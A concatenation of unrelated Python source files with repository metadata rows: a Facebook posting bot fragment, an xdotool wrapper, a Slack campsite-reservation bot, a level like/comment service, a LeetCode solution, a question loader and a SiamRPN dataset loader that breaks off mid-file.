graph = facebook.GraphAPI(access_token=fb_key, version='3.1')
api_request = graph.put_object(
parent_object=page_id,
connection_name='feed',
message=message
)
if 'id' in api_request:
append_log(
source='post_new_assets',
type=LogEntry.LogEntryTypes.LOG,
text='Successfully posted on facebook!'
)
for asset in assets:
asset.sent = True
asset.save()
except facebook.GraphAPIError as e:
append_log(
source='post_new_assets',
type=LogEntry.LogEntryTypes.ERR,
text="facebook.GraphAPIError: " + e.__str__()
)
except KeyError as e:
append_log(
source='post_new_assets',
type=LogEntry.LogEntryTypes.ERR,
text="KeyError: " + e.__str__()
)
def run_bot(status, debug=False):
if status.play_state == 'PLAY':
status.last_run = datetime.now()
status.save()
append_log('run_bot', 0, f'Running bot at {status.last_run}')
session = get_new_session()
sources = AssetSource.objects.all()
for source in sources:
assets = []
if (source.type == AssetSource.SourceTypes.SCRAPE):
assets = scrape_assets(session, source)
else:
assets = get_json_assets(session, source)
new_assets = persist_new_assets(assets)
append_log('run_bot', 0, f'There are {new_assets} new assets')
if new_assets > 0:
result = post_new_assets(source.post_title, debug)
if debug:
return result
else:
append_log('run_bot', 0, 'Bot did not run because it\'s on STOP')
return 'Bot is on STOP!'
| UTF-8 | Python | false | false | 8,124 | py | 25 | functions.py | 13 | 0.529542 | 0.526096 | 0 | 254 | 29.984252 | 140 |
NISH1001/youtube-pauser | 7,241,314,911,170 | 3899226245fd717a4108ea98dd0be98c26f7ace2 | b4a29c887ba71677c6f7eccf7e587dad6627aa4f | /xdotool.py | 2ec63e835017ecd7cdb29d43f72f3192199d4479 | []
| no_license | https://github.com/NISH1001/youtube-pauser | edd36c85fd766c0f3dc6004c27224a500c8a344b | cf0c21d600928e91e2825ab0c17211a59c8805c1 | refs/heads/master | 2021-01-23T09:35:35.119068 | 2017-09-07T11:21:35 | 2017-09-07T11:21:35 | 102,584,205 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
"""
A wrapper over Linux's xdotool
"""
from sysutils import exe
def get_window_name(id):
"""
Fetch name of the window with corresponding id
"""
command = "xdotool getwindowname {}".format(id)
output, error = exe(command)
return output.strip()
def get_window_active():
"""
Fetch id of the currently active window
"""
output, error = exe("xdotool getactivewindow")
return output
def search_window_class(class_name):
"""
Search all the windows with class name
Eg: xdotool search --class Chromium
"""
command = "xdotool search --class {}".format(class_name)
output, error = exe(command)
return output.split()
def activate_window(id):
"""
Focus the window
"""
command = "xdotool windowactivate {}".format(id)
output, error = exe(command)
return output
def send_keys(*args):
key = '+'.join(args)
command = "xdotool key --clearmodifiers {}".format(key)
output, error = exe(command)
return output
def sleep(sec):
command = "xdotool sleep".format(sec)
output, error = exe(command)
def main():
pass
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 1,209 | py | 6 | xdotool.py | 4 | 0.615385 | 0.614557 | 0 | 55 | 20.963636 | 60 |
jacobstr/crusher | 9,912,784,563,453 | 6e29f5bf337aa67f1f2f4e149dcec62cd7994358 | 49719e9882fae16e20df64c142e11d882ca1dccb | /server/app.py | f297b0bcd820de942679f01bb00894213c75ff54 | []
| no_license | https://github.com/jacobstr/crusher | 27cac8fce9c0fb20f23df3e83faf08fad7bf7b60 | a09d67d666f18fcac66d956f7bfcaf3b3346260c | refs/heads/master | 2023-02-06T22:11:04.370165 | 2022-10-19T15:24:22 | 2022-10-19T15:24:22 | 150,933,573 | 2 | 5 | null | false | 2023-02-02T06:16:01 | 2018-09-30T05:26:19 | 2022-11-03T15:21:23 | 2023-02-02T06:15:59 | 147 | 3 | 5 | 8 | Python | false | false | import hashlib
import hmac
import itertools
import json
import logging
import os
import random
import shelve
import textwrap
import arrow
import flask
import humanhash
from slackclient import SlackClient
logging.basicConfig(level=logging.DEBUG)
LOGGER = logging.getLogger(__name__)
app = flask.Flask(__name__)
#: Url format for HTTP api requests to recreation.gov for a given campsite id.
CAMPGROUND_URL = "https://www.recreation.gov/camping/campgrounds/{id}"
#: Maps known general general camping areas to reserve-america-scraper
#: campground names.
CAMPGROUNDS = [
{
"short_name": "Upper Pines",
"name": "UPPER_PINES",
"id": "232447",
"tags": ["yosemite-valley", "yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Lower Pines",
"name": "LOWER_PINES",
"id": "232450",
"tags": ["yosemite-valley", "yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "North Pines",
"name": "NORTH_PINES",
"id": "232449",
"tags": ["yosemite-valley", "yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Dry Gulch",
"name": "DRY_GULCH",
"id": "233842",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Tuolumne Meadows",
"name": "TUOLOUMME",
"id": "232448",
"tags": ["yosemite", "tuolumne"],
"tz": "US/Pacific",
},
{
"short_name": "Crane Flat",
"name": "CRANE_FLAT",
"id": "232452",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Hodgdon Meadow",
"name": "HODGDON_MEADOW",
"id": "232451",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Dirt Flat",
"name": "DIRT_FLAT",
"id": "233839",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Tuolumne Meadows",
"name": "TOULUMNE_MEADOWS",
"id": "232448",
"tags": ["yosemite", "tuolumne"],
"tz": "US/Pacific",
},
{
"short_name": "Kalaloch",
"name": "KALALOCH",
"id": "232464",
"tags": ["mt-olympic"],
"tz": "US/Pacific",
},
{
"short_name": "Sol Duc",
"name": "SOL_DUC",
"id": "251906",
"tags": ["mt-olympic"],
"tz": "US/Pacific",
},
{
"short_name": "Point Reyes National Seashore",
"name": "POINT_REYES",
"id": "233359",
"tags": ["point-reyes"],
"tz": "US/Pacific",
},
{
"short_name": "Cottonwood",
"name": "COTTONWOOD",
"id": "272299",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "Jumbo Rocks",
"name": "JUMBO_ROCKS",
"id": "272300",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "Indian Cove",
"name": "INDIAN_COVE",
"id": "232472",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "Black Rock",
"name": "BLACK_ROCK",
"id": "232473",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "St. Mary",
"name": "ST_MARY",
"id": "232492",
"tags": ["gnp"],
"tz": "US/Mountain",
},
{
"short_name": "Fish Creek",
"name": "FISH_CREEK",
"id": "232493",
"tags": ["gnp"],
"tz": "US/Mountain",
},
{
"short_name": "Many Glacier",
"name": "MANY_GLACIER",
"id": "251869",
"tags": ["gnp"],
"tz": "US/Mountain",
},
{
"short_name": "Colter Bay",
"name": "COLTER_BAY",
"id": "258830",
"tags": ["teton"],
"tz": "US/Mountain",
},
{
"short_name": "Jenny Lake",
"name": "JENNY_LAKE",
"id": "247664",
"tags": ["teton"],
"tz": "US/Mountain",
},
{
"short_name": "South Campground",
"name": "SOUTH_CAMPGROUND",
"id": "272266",
"tags": ["zion"],
"tz": "US/Central",
},
{
"short_name": "Watchman Campground",
"name": "WATCHMAN_CAMPGROUND",
"id": "232445",
"tags": ["zion"],
"tz": "US/Central",
},
]
#: Known campground tags formed via a superset of all tags in the CAMPGROUNDS
#: collection defined above. CAMPGROUNDS is the authoriative source for this
#: data.
CAMPGROUND_TAGS = list(set(itertools.chain.from_iterable([cg['tags'] for cg in CAMPGROUNDS])))
#: The API token for the slack bot can be obtained via:
#: https://api.slack.com/apps/AD3G033C4/oauth?
SLACK_API_KEY = os.getenv('SLACK_API_KEY')
#: Shared secret used to sign requests.
SLACK_SIGNING_SECRET = os.getenv('SLACK_SIGNING_SECRET')
#: In addition to @messaging the user that registered the watcher,
#: the bot will also messsage this public channel.
PUBLIC_RESULTS_CHANNEL = "campsites"
#: This should match the name of the application, using a different name
#: is a from of masquerading and may require additional permissions.
BOT_NAME = "CrusherScrape"
#: The path to the watcher database.
REPO_PATH = os.getenv('CRUSHER_REPO_PATH', '/tmp/crusher.db')
class WatchersRepo(object):
"""
Ghetto jank interface around our mega-lame disk-based database. We store
reservations as list instead of a dict because the assumption is this thing
will not get very large - in fact we'll probably enforce it - and it
seemed appropriate that contents should be ordered.
"""
KEY = 'watchers'
def __init__(self, path):
self.path = path
def _set(self, data):
s = shelve.open(self.path, writeback=True)
try:
s[self.KEY] = data
finally:
s.close()
def list(self):
s = shelve.open(self.path)
try:
watchers = s[self.KEY]
except KeyError:
return []
finally:
s.close()
return watchers
def remove(self, watcher_id):
watchers = [x for x in self.list() if x['id'] != watcher_id]
self._set(watchers)
return watchers
def get(self, watcher_id):
watchers = [x for x in self.list() if x['id'] == watcher_id]
if len(watchers) > 0:
return watchers[0]
else:
return None
def update(self, watcher):
watchers = self.list()
for i, w in enumerate(watchers):
if w['id'] == watcher['id']:
watchers[i] = watcher
break
self._set(watchers)
def append(self, watcher):
watchers = self.list()
watchers.append(watcher)
self._set(watchers)
#: Global disk-based database of watcher registrations.
WATCHERS = WatchersRepo(REPO_PATH)
def random_id():
return humanhash.humanize(hashlib.md5(os.urandom(32)).hexdigest())
def make_watcher(user_id, campground, start, length):
return {
"id": random_id(),
"user_id": user_id,
"campground": campground,
"start": start,
"length": length,
"silenced": False,
}
def add_watcher(user_id, campground, start, length):
if campground not in CAMPGROUND_TAGS:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Unknown camping area, please select one of {}".format(
', '.join(CAMPGROUND_TAGS),
)
})
WATCHERS.append(make_watcher(
user_id,
campground,
start,
length,
))
return flask.jsonify({
"text": "Thanks <@{}>, I've registered your reservation request for *{}*.".format(
user_id,
campground,
)
})
@app.route('/meta/campgrounds')
def meta_campgrounds():
return flask.jsonify(CAMPGROUNDS)
@app.route('/meta/tags')
def meta_campground_tags():
return flask.jsonify(CAMPGROUND_TAGS)
@app.route('/watchers')
def watchers_list():
return flask.jsonify(WATCHERS.list())
@app.route('/watchers/<watcher_id>')
def watchers_get(watcher_id):
return flask.jsonify(WATCHERS.get(watcher_id))
@app.route('/watchers/<watcher_id>/delete', methods=['POST'])
def watchers_delete(watcher_id):
return flask.jsonify(WATCHERS.remove(watcher_id))
def results_changed(old, new):
# Hackish way to compare two lists.
return json.dumps(old) != json.dumps(new)
@app.route('/watchers/<watcher_id>/results', methods=['POST'])
def watchers_results(watcher_id):
watcher = WATCHERS.get(watcher_id)
old_results = watcher.get('results', [])
#: Trusting random input from the internet here.
results = flask.request.get_json()
watcher['results'] = results
WATCHERS.update(watcher)
has_changed = results_changed(old_results, results)
if len(results) and not watcher.get('silenced') and has_changed:
slack = SlackClient(SLACK_API_KEY)
resp = slack.api_call(
"chat.postMessage",
username=BOT_NAME,
text="New campsites available!",
channel=watcher['user_id'],
attachments=make_results_attachments(results),
)
return flask.jsonify(watcher)
def slack_list_watchers(user_id=None):
watchers = WATCHERS.list()
if user_id:
watchers = [watcher for watcher in WATCHERS.list() if watcher['user_id'] == user_id]
if len(watchers):
return flask.jsonify({
"response_type": "in_channel",
"attachments": make_watcher_attachments(watchers),
})
else:
return flask.jsonify({
"response_type": "in_channel",
"text": "No active watchers at the moment!",
})
def slack_list_campgrounds(tags):
cgs = []
for cg in CAMPGROUNDS:
# Check intersection if tags is non-empty.
if tags and not set(tags) & set(cg['tags']):
continue
cgs.append({
"fallback": "Campground metadata",
"mrkdwn_in": ["text"],
"title": cg['short_name'],
"title_link": CAMPGROUND_URL.format(id=cg['id']),
"fields": [
{
"title": "tags",
"value": ", ".join(cg['tags']),
"short": True,
},
],
})
if cgs:
return flask.jsonify({
"response_type": "in_channel",
"text": "Campgrounds",
"attachments": cgs,
})
else:
return flask.jsonify({
"response_type": "in_channel",
"text": "No campgrounds match the given tags.",
})
@app.route('/slack/actions', methods=['POST'])
def slack_actions():
payload = json.loads(flask.request.values['payload'])
if payload['callback_id'] != 'watcher_manage':
return flask.jsonify({"text":"Sorry, I didn't get that!"})
action = payload['actions'][0]
# Sample payload: see contrib/sample_action_payload.json
if action['name'] == 'cancel':
WATCHERS.remove(action['value'])
return slack_list_watchers()
if action['name'] == 'results':
watcher = WATCHERS.get(action['value'])
return flask.jsonify({
"text": "Results for {} on {}".format(watcher['campground'], watcher['start']),
"attachments": make_results_attachments(watcher['results']),
})
if action['name'] == 'silence':
watcher = WATCHERS.get(action['value'])
watcher['silenced'] = True
WATCHERS.update(watcher)
return flask.jsonify({
"text": "Silenced watcher, will no longer message <@{}>!".format(watcher['user_id']),
})
if action['name'] == 'unsilence':
watcher = WATCHERS.get(action['value'])
watcher['silenced'] = False
WATCHERS.update(watcher)
return flask.jsonify({
"text": "Unsilenced watcher, will now message <@{}> with results!".format(watcher['user_id']),
})
else:
return flask.jsonify({"text":"Sorry, I didn't get that!"})
@app.route('/slack/commands', methods=['POST'])
def slack_slash_commands():
"""
Handles responding to slash commands for reservations.
Commands:
/crush watch <campground-tag> <DD/MM/YY> <length>
------------------------------------------------------
Registers a new watcher for a reservation. This will begin a periodic
scraping process against the recreation.gov website. When succesful we'll
send you a slack message with results.
Campgrounds are selected according to `campground-tag` you provide. The bot
will attempt to find sites within any campground that matches the tag you
provide.
To list campgrounds and their tags, use the `campgrounds` command.
/crush list
----------------------
Lists active watchers for the current user.
/crush list-all
----------------------
Lists active watchers for all users.
/crush campgrounds [tags...]
------------------
Lists known campgrounds, optionally filtered by those that match any of the
provided tags. For example, if you wish to list what the bot considers
a 'yosemite-valley' campground use `/crush campgrounds yosemite-valley`.
Syntax:
- Square brackets, as in `[param]`, denote optional parameters.
- Angle brackets, as in `<param>`, denote required parameters.
- Ellipsis, `...` following a parameter denote a space-separated list.
"""
raw_data = flask.request.get_data()
if not verify_slack_request(
flask.request.headers['X-Slack-Signature'],
flask.request.headers['X-Slack-Request-Timestamp'],
raw_data.decode('utf-8'),
):
return flask.Response(status=400)
text = flask.request.form['text']
if len(text) == 0:
return flask.jsonify({
"response_type": "ephemeral",
# We re-use the docstring in this function as the help text.
"text": "I need a subcommand!\n```{}```".format(textwrap.dedent(slack_slash_commands.__doc__))
})
# Request payload mangling and subcommand delegation occurs.
parts = text.split(' ')
command = parts[0]
args = parts[1:]
if command == 'watch':
if len(args) != 3:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Please use a format like `tuolumne DD/MM/YY <length>`."
})
campground, start, length = args
try:
date = arrow.get(start, 'DD/MM/YY')
except:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Could not parse your date, please use a DD/MM/YY format.",
})
# Hackish workaround: 01/01/2019 successfully parses via DD/MM/YY above,
# but will subsequently get interpretted as e.g. "2020" - ignoring the
# latter two characters.
if date.format('DD/MM/YY') != start:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Could not parse your date, please use a DD/MM/YY format.",
})
user_id = flask.request.form['user_id']
return add_watcher(user_id, campground, start, int(length))
elif command == 'list':
return slack_list_watchers(flask.request.form['user_id'])
elif command == 'list-all':
return slack_list_watchers()
elif command == 'campgrounds':
return slack_list_campgrounds(args)
elif command == 'help':
return flask.jsonify({
"response_type": "ephemeral",
"text": "```{}```".format(textwrap.dedent(slack_slash_commands.__doc__))
})
else:
return flask.jsonify({
"response_type": "ephemeral",
"text": "I haven't been implemented yet!",
})
def make_watcher_attachments(watchers):
"""
Returns a json-encodable representation of attachments representing active watchers.
"""
results = []
for watcher in watchers:
watch_results = watcher.get('results')
if watch_results:
text = "<@{}> found sites in *{}* from {} for {} day(s).".format(
watcher['user_id'],
watcher['campground'],
watcher['start'],
watcher['length'],
)
color = "#36a64f"
else:
text = "<@{}> is looking in *{}* from {} for {} day(s).".format(
watcher['user_id'],
watcher['campground'],
watcher['start'],
watcher['length'],
)
color = "#ccbd22"
attachment = {
"fallback": "Required plain-text summary of the attachment.",
"color": color,
"text": text,
"mrkdwn_in": ["text", "pretext"],
"callback_id": "watcher_manage",
"actions": [
{
"name": "cancel",
"text": "Remove",
"style": "danger",
"type": "button",
"value": watcher['id'],
"confirm": {
"title": "Are you sure?",
"text": "This will cancel scraping for this reservation.",
"ok_text": "Yes",
"dismiss_text": "No"
},
},
]
}
if watcher.get('silenced'):
attachment['actions'].insert(0, {
"name": "unsilence",
"text": "Unsilence",
"type": "button",
"value": watcher['id'],
})
else:
attachment['actions'].insert(0, {
"name": "silence",
"text": "Silence",
"type": "button",
"value": watcher['id'],
})
if watch_results:
attachment['actions'].insert(0, {
"name": "results",
"text": "Show Results",
"type": "button",
"style": "primary",
"value": watcher['id'],
})
results.append(attachment)
return results
def make_results_attachments(results):
"""
Returns a json-encodable representation of attachments representing found campsites.
"""
return [{
"fallback": "Campsite result.",
"color": "#36a64f",
"mrkdwn_in": ["text"],
"title": "Found a {} on {} at {} site {} for {:.0%} of requested stay.".format(
':unicorn_face:' if result['fraction'] == 1 else 'site',
result['date'],
result['campground']['short_name'],
result['campsite']['site'],
result['fraction'],
),
"title_link": result['url'],
} for result in results]
# Thanks Jani Karhunen: https://janikarhunen.fi/verify-slack-requests-in-aws-lambda-and-python.html
def verify_slack_request(slack_signature=None, slack_request_timestamp=None, request_body=None):
''' Form the basestring as stated in the Slack API docs. We need to make a bytestring. '''
basestring = f"v0:{slack_request_timestamp}:{request_body}".encode('utf-8')
''' Make the Signing Secret a bytestring too. '''
slack_signing_secret = bytes(SLACK_SIGNING_SECRET, 'utf-8')
''' Create a new HMAC "signature", and return the string presentation. '''
my_signature = 'v0=' + hmac.new(slack_signing_secret, basestring, hashlib.sha256).hexdigest()
''' Compare the the Slack provided signature to ours.
If they are equal, the request should be verified successfully.
Log the unsuccessful requests for further analysis
(along with another relevant info about the request). '''
if hmac.compare_digest(my_signature, slack_signature):
return True
else:
LOGGER.warning(f"Verification failed. my_signature: {my_signature} basestring: {basestring}")
return False
| UTF-8 | Python | false | false | 20,161 | py | 27 | app.py | 5 | 0.540697 | 0.531224 | 0 | 661 | 29.500756 | 106 |
ashkan18/like-api | 481,036,372,826 | fd1018993b41db600da666ac3a35c485dcfe45b3 | f7a088759f35a08e492ea66f625bda2426163a76 | /services/level_service.py | caea6c2a5a758dd599555e682150e891bc9341d8 | []
| no_license | https://github.com/ashkan18/like-api | dc82587e57145e16b28884a773eae3b8ac24c73f | f2c4074d05fb8e5766463dc50736e1fe71a40637 | refs/heads/master | 2016-08-03T14:19:15.399546 | 2014-05-12T22:23:29 | 2014-05-12T22:23:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from models.comment_model import CommentModel
from models.level_model import LevelModel
from models.user_model import UserModel
from services import user_service
__author__ = 'root'
def get_level_stats(level_id):
"""
This method will get the total number of likes for specific level
@param level_id: integer id of the level we are looking for
@return: count of number of likes and comments each level has had
"""
level = LevelModel.query(LevelModel.level_id == level_id).get()
if level is None:
return 0
else:
return level.likes_count, level.comments_count
def comment_on_level(level_id, user_id, comment_text):
"""
This method will add a comment to a level and also list of users comments
@param level_id: integer id of the level we are adding this comment
@param user_id: ineteger id of the user who is adding this comment
@param comment_text: the text of the comment
"""
level = get_level_by_id(level_id)
user = user_service.get_user_by_id(user_id)
comment = CommentModel(user_id=user_id, level_id=level_id, text=comment_text)
level.comments.append(comment)
user.comments.append(comment)
level.put()
user.put()
def like_level(level_id, user_id):
"""
This method will add a like to a level by a user
@param level_id: integer id of the level we are adding the like
@param user_id: integer id of the user who liked the level
"""
level = get_level_by_id(level_id)
user = user_service.get_user_by_id()
user.likes.append(level_id)
level.likes.append(user_id)
level.put()
user._put()
def get_level_by_id(level_id):
"""
This method will get a level model by level id, if we don't have this level, it will create one
@param level_id: id of the level we are looking for
@return: levelModel of the model we are looking for
"""
level = LevelModel.query(LevelModel.level_id == level_id).get()
# if we haven't had this level before, add it
if level is None:
level = LevelModel(level_id=level_id)
return level
| UTF-8 | Python | false | false | 2,095 | py | 10 | level_service.py | 9 | 0.6821 | 0.681623 | 0 | 62 | 32.790323 | 99 |
wyaadarsh/LeetCode-Solutions | 6,777,458,441,493 | c4cd383f6875abd08cd613d65b6fe9735cce945a | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/1258-Synonymous-Sentences/soln.py | 8f3b59d4ac4a188bd1e24f702beec4862215187d | [
"MIT"
]
| permissive | https://github.com/wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | true | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | 2020-08-30T15:49:37 | 2020-08-30T15:49:34 | 7,769 | 0 | 0 | 0 | null | false | false | class Solution:
def generateSentences(self, synonyms: List[List[str]], text: str) -> List[str]:
sets = []
words = set()
for u, v in synonyms:
if u not in words and v not in words:
sets.append({u, v})
else:
for s in sets:
if u in s or v in s:
s.add(u)
s.add(v)
words.add(u)
words.add(v)
tokens = text.split()
cands = []
for i, token in enumerate(tokens):
if token in words:
for s in sets:
if token in s:
cands.append(s)
break
template = " ".join(token if token not in words else "{}" for token in tokens)
ans = []
for word_comb in itertools.product(*cands):
ans.append(template.format(*word_comb))
return sorted(ans)
| UTF-8 | Python | false | false | 956 | py | 3,904 | soln.py | 3,904 | 0.443515 | 0.443515 | 0 | 27 | 34.407407 | 86 |
XinnuoXu/AggGen | 15,891,379,024,134 | af13616d9e89ec60b6fcdfda49ccc2563613b08c | f599d89129aee1ca1e5c9e845c2643c2242a4caa | /data_webnlg/evaluation_annotation.py | 0e1ea7a9024aaa4a23f2e06bdc9874c033c69db8 | []
| no_license | https://github.com/XinnuoXu/AggGen | f6b034e95b24859f6bd4d6c5594edf64af5ee215 | df05a9d1ab99d48c9a7ff8f73d6645a2c7596d64 | refs/heads/master | 2023-05-14T05:07:01.509324 | 2021-05-31T07:32:57 | 2021-05-31T07:32:57 | 294,522,221 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #coding=utf8
import os, sys
from sklearn.metrics.cluster import normalized_mutual_info_score
from scipy.stats import kendalltau
from scipy.stats import spearmanr
GT_PATH = './data-rst/webnlg_ann_gt_plan.jsonl'
SRC_PATH = './data-rst/webnlg_ann_src.jsonl'
ANN_PATH = './data-alg/webnlg_ann_tgt.jsonl'
class Percision(object):
def load_cand(self):
cands = []
for line in open(ANN_PATH):
flist = line.strip().split('\t')
sequence = flist[1].split('|')
ann_res = {}
for i, slot in enumerate(sequence):
types = slot.split('&')
for t in types:
ann_res[t] = i
cands.append(ann_res)
return cands
def load_gold(self):
golds = []
for line in open(GT_PATH):
sequence = line.strip().split('|')
ann_res = {}
for i, slot in enumerate(sequence):
types = slot.split('&')
for t in types:
ann_res[t] = i
golds.append(ann_res)
return golds
def load_src(self):
srcs = []
for line in open(SRC_PATH):
srcs.append(line.strip().split('\t')[-1].split('|'))
return srcs
def get_acc(self, cands, golds, srcs):
acc = 0; num = 0
for i, src in enumerate(srcs):
gold = golds[i]
cand = cands[i]
cand_ann = [cand[s] for s in src]
gold_ann = [gold[s] for s in src]
for j in range(len(cand_ann)):
if cand_ann[j] == gold_ann[j]:
acc += 1
num += 1
return acc/num
def run(self):
cands = self.load_cand()
golds = self.load_gold()
srcs = self.load_src()
acc = self.get_acc(cands, golds, srcs)
print ('acc:', acc)
if __name__ == '__main__':
acc_obj = Percision()
acc_obj.run()
| UTF-8 | Python | false | false | 1,945 | py | 175 | evaluation_annotation.py | 88 | 0.497172 | 0.493573 | 0 | 67 | 28.029851 | 64 |
CSI-BennettUniversity/Sample-Project-1 | 6,914,897,378,682 | 28a5014fea8d35301e2e0d5ef80841b0fad4fae2 | 25ad0b1a056c6fb988fa8c8718bb7cd55388ee5f | /interactions/functions/questions.py | 8eb6f911499398574032e1e9d5484be19fc91f95 | [
"MIT"
]
| permissive | https://github.com/CSI-BennettUniversity/Sample-Project-1 | eeab14a36eeae8d65cdd85efaf54c85732985dcf | 23197352372b7ad00a026683477b5a95a4178e35 | refs/heads/master | 2023-05-13T17:25:26.652317 | 2021-06-05T14:53:15 | 2021-06-05T14:53:15 | 374,136,065 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import random
from os import path
def return_questions(model: str) -> list:
""" This loads the questions from ``interactions/static/data/*.json`` as
per requirement and raises an ``Exception`` if the requested question
is not among the ones available. """
if model == 'SelfAnswerGroup':
file = 'self_questions'
elif model == 'RelationAnswerGroup':
file = 'relation_questions'
else:
raise Exception(
(f"Invalid model ({model}) used."
" Only SelfAnswerGroup and RelationAnswerGroup allowed.")
)
file_path = path.dirname(path.dirname(__file__))
with open(path.join(file_path, 'static', 'data', f"{file}.json")) as f:
json_data = json.load(f)
random.shuffle(json_data)
return json_data
| UTF-8 | Python | false | false | 810 | py | 130 | questions.py | 74 | 0.630864 | 0.630864 | 0 | 24 | 32.75 | 76 |
zhu2014yi/CRPN | 14,422,500,191,338 | cfed43e15e8c7224d446cd7bba36c7d0d6b13591 | 196b1bb1a3d6b4bc85bc72c055a6c6acb2fc3269 | /lib/dataset/siamrpn.py | 1e029654d13250f61e54de40be113a2a79f253ba | [
"MIT"
]
| permissive | https://github.com/zhu2014yi/CRPN | 9dd1b016af54c41de98fc080185453fb98e189e0 | 5da5bf42eb8c86a17bdff52680c3827a2ef18590 | refs/heads/master | 2023-03-07T21:50:22.931776 | 2021-02-17T04:09:44 | 2021-02-17T04:09:44 | 262,253,242 | 15 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Zhipeng Zhang (zhangzhipeng2017@ia.ac.cn)
# Details: siamrpn dataset generator
# Reference: SiamRPN [Li]
# ------------------------------------------------------------------------------
from __future__ import division
import os
import cv2
import json
import math
import random
import numpy as np
import torchvision.transforms as transforms
from os.path import join
from torch.utils.data import Dataset
from easydict import EasyDict as edict
from scipy.ndimage.filters import gaussian_filter
import sys
sys.path.append('../')
from utils.utils import *
from core.config import config
from .module import SingleData
sample_random = random.Random()
#sample_random.seed(123456)
eps = 1e-7
class SiamRPNDataset(Dataset):
def __init__(self, cfg):
super(SiamRPNDataset, self).__init__()
# pair information
self.template_size = cfg.SIAMRPN.TRAIN.TEMPLATE_SIZE
self.search_size = cfg.SIAMRPN.TRAIN.SEARCH_SIZE
self.score_size = (self.search_size - self.template_size) // cfg.SIAMRPN.TRAIN.STRIDE + 1 # from cross-correlation
# anchors information
self.thr_high = cfg.SIAMRPN.TRAIN.ANCHORS_THR_HIGH
self.thr_low = cfg.SIAMRPN.TRAIN.ANCHORS_THR_LOW
self.pos_keep = cfg.SIAMRPN.TRAIN.ANCHORS_POS_KEEP # kept positive anchors to calc loss
self.all_keep = cfg.SIAMRPN.TRAIN.ANCHORS_ALL_KEEP # kept anchors to calc loss
self.stride = cfg.SIAMRPN.TRAIN.STRIDE
self.anchor_nums = len(cfg.SIAMRPN.TRAIN.ANCHORS_RATIOS) * len(config.SIAMRPN.TRAIN.ANCHORS_SCALES)
self._naive_anchors(cfg) # return self.anchors_naive [anchor_num, 4]
self._pair_anchors(center=self.search_size//2, score_size=self.score_size)
# aug information
self.color = cfg.SIAMRPN.DATASET.COLOR
self.flip = cfg.SIAMRPN.DATASET.FLIP
self.rotation = cfg.SIAMRPN.DATASET.ROTATION
self.blur = cfg.SIAMRPN.DATASET.BLUR
self.shift_template = cfg.SIAMRPN.DATASET.TEMPLATE_SHIFT
self.shift_search = cfg.SIAMRPN.DATASET.SEARCH_SHIFT
self.scale_template = cfg.SIAMRPN.DATASET.TEMPLATE_SCALE
self.scale_search = cfg.SIAMRPN.DATASET.SEARCH_SCALE
self.transform_extra = transforms.Compose(
[transforms.ToPILImage(), ] +
([transforms.ColorJitter(0.05, 0.05, 0.05, 0.05), ] if self.color > random.random() else [])
+ ([transforms.RandomHorizontalFlip(), ] if self.flip > random.random() else [])
+ ([transforms.RandomRotation(degrees=10), ] if self.rotation > random.random() else [])
)
# train data information
print('train datas: {}'.format(cfg.SIAMRPN.TRAIN.WHICH_USE))
self.train_datas = [] # all train dataset
start = 0
self.num = 0
for data_name in cfg.SIAMRPN.TRAIN.WHICH_USE:
dataset = SingleData(cfg, data_name, start)
self.train_datas.append(dataset)
start += dataset.num # real video number
self.num += dataset.num_use # the number used for subset shuffle
# assert abs(self.num - cfg.SIAMRPN.TRAIN.PAIRS) < eps, 'given pairs is not equal to sum of all dataset'
self._shuffle()
print(cfg)
def __len__(self):
return self.num
def __getitem__(self, index):
# choose a dataset
index = self.pick[index]
dataset, index = self._choose_dataset(index)
#neg = config.DATASET.NEG and config.DATASET.NEG > np.random.random()
neg=0
if neg:
template = dataset.get_random_target(index)
search = np.random.choice(self.all_dataset).get_random_target()
else:
template, search = dataset._get_pairs(index)
# read images
template_image = cv2.imread(template[0])
search_image = cv2.imread(search[0])
# transform original bbox to cropped image
template_box = self._toBBox(template_image, template[1])
search_box = self._toBBox(search_image, search[1])
template, _, _ = self._augmentation_template(template_image, template_box, self.template_size)
search, bbox, dag_param = self._augmentation_search(search_image, search_box, self.search_size)
# from PIL image to numpy
template = np.array(template)
search = np.array(search)
# get label for regression
cls, delta, delta_weight= self._anchor_target(bbox, pos_keep=self.pos_keep, all_keep=self.all_keep,
thr_high=self.thr_high, thr_low=self.thr_low)
sum_weight = self._dynamic_label([self.score_size, self.score_size], dag_param['shift'], 'balanced')
template, search = map(lambda x: np.transpose(x, (2, 0, 1)).astype(np.float32), [template, search])
return template, search, cls,delta, delta_weight, sum_weight, np.array(bbox, np.float64)
# ------------------------------------
# function groups for selecting pairs
# ------------------------------------
def _python2round(self, f):
"""
use python2 round in python3 verison.
"""
if round(f + 1) - round(f) != 1:
return f + abs(f) / f * 0.5
return round(f)
